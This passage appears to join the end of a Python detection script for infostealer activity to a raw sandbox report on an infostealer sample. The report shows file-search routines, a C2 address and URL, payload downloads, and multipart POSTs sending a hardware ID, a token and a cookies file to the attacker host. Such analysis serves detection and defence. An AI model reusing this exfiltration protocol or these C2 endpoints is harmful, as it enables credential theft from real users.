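        "Image": r"C:\Users\user\Desktop\file.exe",
        "TargetFilename": r"C:\ProgramData\nss3.dll",
    },
    {   # Firefox's own nss3.dll lives under Program Files, not ProgramData
        "EventType": "FileCreate", "ProcessId": 2214,
        "Image": r"C:\Program Files\Mozilla Firefox\updater.exe",
        "TargetFilename": r"C:\Program Files\Mozilla Firefox\nss3.dll",
    },
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Tying the self-delete rule to the parent image is what keeps it quiet on administrative scripts; the DLL rule is worth running retroactively, because the del glob removes the evidence within seconds of the upload finishing.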

Compliance

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Unpacked PE file: 20.2.7ca32398cd.exe.400000.0.unpack
Source: C:\Users\user\1000003002\5aa32fec17.exe Unpacked PE file: 23.2.5aa32fec17.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Unpacked PE file: 37.2.7ca32398cd.exe.400000.0.unpack
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49717 version: TLS 1.0
Source: unknown HTTPS traffic detected: 192.168.2.6:49717 -> 173.222.162.64:443 version: TLS 1.0
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.32.68:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49767 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49815 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49815 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49823 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:49901 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49908 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:49931 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:49935 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:49965 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:49970 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49972 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49973 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.6:49975 version: TLS 1.2
Source: unknown HTTPS traffic detected: 143.204.215.18:443 -> 192.168.2.6:49976 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.6:49979 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49981 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:49982 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:49984 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:49985 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50002 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50019 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:58880 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:58879 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:58877 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:58878 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:58881 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:58882 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:58884 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:58885 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:59072 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49807 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.208.16.95:443 -> 192.168.2.6:49824 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:50071 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50304 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50301 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50303 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50300 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50302 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50305 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50307 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50308 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50309 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:54094 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2447822341.000000006CBAD000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: gdi32.pdb source: firefox.exe, 00000021.00000003.3399821667.00000169CBCC1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2450595340.000000006CD6F000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: msasn1.pdb source: firefox.exe, 00000021.00000003.3397835645.00000169CD8A1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: xWindows.Security.Integrity.pdb source: firefox.exe, 00000021.00000003.3396520559.00000169D34CE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: pnrpnsp.pdb source: firefox.exe, 00000021.00000003.3397548903.00000169D1B86000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: NapiNSP.pdb source: firefox.exe, 00000021.00000003.3397548903.00000169D1B86000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: nsi.pdb source: firefox.exe, 00000021.00000003.3396520559.00000169D34B6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: combase.pdb source: firefox.exe, 00000021.00000003.3413206321.00000169CBCF4000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: xOneCoreUAPCommonProxyStub.pdb source: firefox.exe, 00000021.00000003.3396520559.00000169D34CE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: UxTheme.pdb@ source: firefox.exe, 00000021.00000003.3412223817.00000169CBD28000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: winrnr.pdb source: firefox.exe, 00000021.00000003.3396520559.00000169D34B6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2450595340.000000006CD6F000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2447822341.000000006CBAD000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: imm32.pdb source: firefox.exe, 00000021.00000003.3399821667.00000169CBCC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3413206321.00000169CBCF4000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040D8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040F4F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040BCB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_004139B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0040E270
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00401710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_004143F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040DC50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA, 0_2_00414050
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0040EB60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_004133C0
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: firefox.exe Memory has grown: Private usage: 1MB later: 270MB

Networking

Source: Malware configuration extractor URLs: http://85.28.47.31/5499d72b3a3e55be.php
Source: Malware configuration extractor URLs: http://85.28.47.31silence
Source: Malware configuration extractor IPs: 185.215.113.19
Source: unknown Network traffic detected: DNS query count 33
Source: global traffic TCP traffic: 192.168.2.6:53395 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.6:54028 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.6:58872 -> 1.1.1.1:53
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 08:36:07 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 08:36:12 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 08:36:13 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 08:36:13 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 08:36:14 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 08:36:16 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 08:36:16 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 08:36:18 GMTContent-Type: application/octet-streamContent-Length: 1921024Last-Modified: Fri, 26 Jul 2024 07:32:05 GMTConnection: keep-aliveETag: "66a350f5-1d5000"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 08:36:21 GMTContent-Type: application/octet-streamContent-Length: 1912832Last-Modified: Fri, 26 Jul 2024 07:31:29 GMTConnection: keep-aliveETag: "66a350d1-1d3000"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 08:37:05 GMTContent-Type: application/octet-streamContent-Length: 253952Last-Modified: Fri, 26 Jul 2024 08:14:45 GMTConnection: keep-aliveETag: "66a35af5-3e000"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 08:37:09 GMTContent-Type: application/octet-streamContent-Length: 91648Last-Modified: Fri, 26 Jul 2024 07:30:51 GMTConnection: keep-aliveETag: "66a350ab-16600"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: POST /OneCollector/1.0/ HTTP/1.1Accept: */*APIKey: cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521AuthMsaDeviceTicket: t=GwAWAbuEBAAU2qcZHJoKGNizGOeyqM4OaIoSZ0MOZgAAENX7wUC+MYl+R+dP6Ge+Ps/gAK2S4rAvLsS9lNlstWnrY2Ovw6/QYWUW40yWi3W2oq2TgmfD/F4rhcGc/Q3kxTRWn1J3nPhOAny4YuIpbKp/JxVo2IKfr0u2Ob+Xasi+8kVvlgcJFM/02j6m9rZf8SsufBGSnZuCNcAMbSRQwAt9ttIddTRQ/7dkFG7ZzhfDKlscCwPqu8roSfIr2wEDw126PJnTg8kgpdZV8FhO09Z9yZkJbvNRCuX40AaiKTP7/kep+t5XHG1Tp05wc6bODUUz8SiWkHpg7isRn5nplH5Pwj6qy8wfjiPn8r9T6Iz9u6hFIAE=&p=Client-Id: NO_AUTHContent-Encoding: deflateContent-Type: application/bond-compact-binaryExpect: 100-continueSDK-Version: EVT-Windows-C++-No-3.4.15.1Upload-Time: 1721983262778Host: self.events.data.microsoft.comContent-Length: 7973Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKEBAKFHCFHIEBFBAFBHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 36 41 43 44 37 44 43 45 35 32 33 31 38 31 37 37 30 34 35 37 31 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 2d 2d 0d 0a Data Ascii: ------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="hwid"F6ACD7DCE5231817704571------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="build"sila------DAKEBAKFHCFHIEBFBAFB--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHJKJDGCGDAKFHIDBGCHost: 85.28.47.31Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 31 35 64 39 30 34 61 33 64 34 32 64 35 61 38 65 36 66 33 63 34 62 39 61 64 61 34 37 38 33 63 32 33 62 35 64 37 61 64 33 63 61 62 64 31 66 39 39 30 62 30 64 61 36 64 33 66 33 32 34 35 33 32 64 64 63 37 36 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 2d 2d 0d 0a Data Ascii: ------KEHJKJDGCGDAKFHIDBGCContent-Disposition: form-data; name="token"66415d904a3d42d5a8e6f3c4b9ada4783c23b5d7ad3cabd1f990b0da6d3f324532ddc765------KEHJKJDGCGDAKFHIDBGCContent-Disposition: form-data; name="message"browsers------KEHJKJDGCGDAKFHIDBGC--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDHDGDHJEGHIDGDHCGCHost: 85.28.47.31Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 31 35 64 39 30 34 61 33 64 34 32 64 35 61 38 65 36 66 33 63 34 62 39 61 64 61 34 37 38 33 63 32 33 62 35 64 37 61 64 33 63 61 62 64 31 66 39 39 30 62 30 64 61 36 64 33 66 33 32 34 35 33 32 64 64 63 37 36 35 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 2d 2d 0d 0a Data Ascii: ------HIDHDGDHJEGHIDGDHCGCContent-Disposition: form-data; name="token"66415d904a3d42d5a8e6f3c4b9ada4783c23b5d7ad3cabd1f990b0da6d3f324532ddc765------HIDHDGDHJEGHIDGDHCGCContent-Disposition: form-data; name="message"plugins------HIDHDGDHJEGHIDGDHCGC--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCBAEBAEBFHCAKFCAKEHost: 85.28.47.31Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 31 35 64 39 30 34 61 33 64 34 32 64 35 61 38 65 36 66 33 63 34 62 39 61 64 61 34 37 38 33 63 32 33 62 35 64 37 61 64 33 63 61 62 64 31 66 39 39 30 62 30 64 61 36 64 33 66 33 32 34 35 33 32 64 64 63 37 36 35 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 2d 2d 0d 0a Data Ascii: ------AFCBAEBAEBFHCAKFCAKEContent-Disposition: form-data; name="token"66415d904a3d42d5a8e6f3c4b9ada4783c23b5d7ad3cabd1f990b0da6d3f324532ddc765------AFCBAEBAEBFHCAKFCAKEContent-Disposition: form-data; name="message"fplugins------AFCBAEBAEBFHCAKFCAKE--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBGHCBAEGDHIDGCBAECHost: 85.28.47.31Content-Length: 5627Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/sqlite3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKFIJDHJEGIDHJKKKJJHost: 85.28.47.31Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 31 35 64 39 30 34 61 33 64 34 32 64 35 61 38 65 36 66 33 63 34 62 39 61 64 61 34 37 38 33 63 32 33 62 35 64 37 61 64 33 63 61 62 64 31 66 39 39 30 62 30 64 61 36 64 33 66 33 32 34 35 33 32 64 64 63 37 36 35 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 
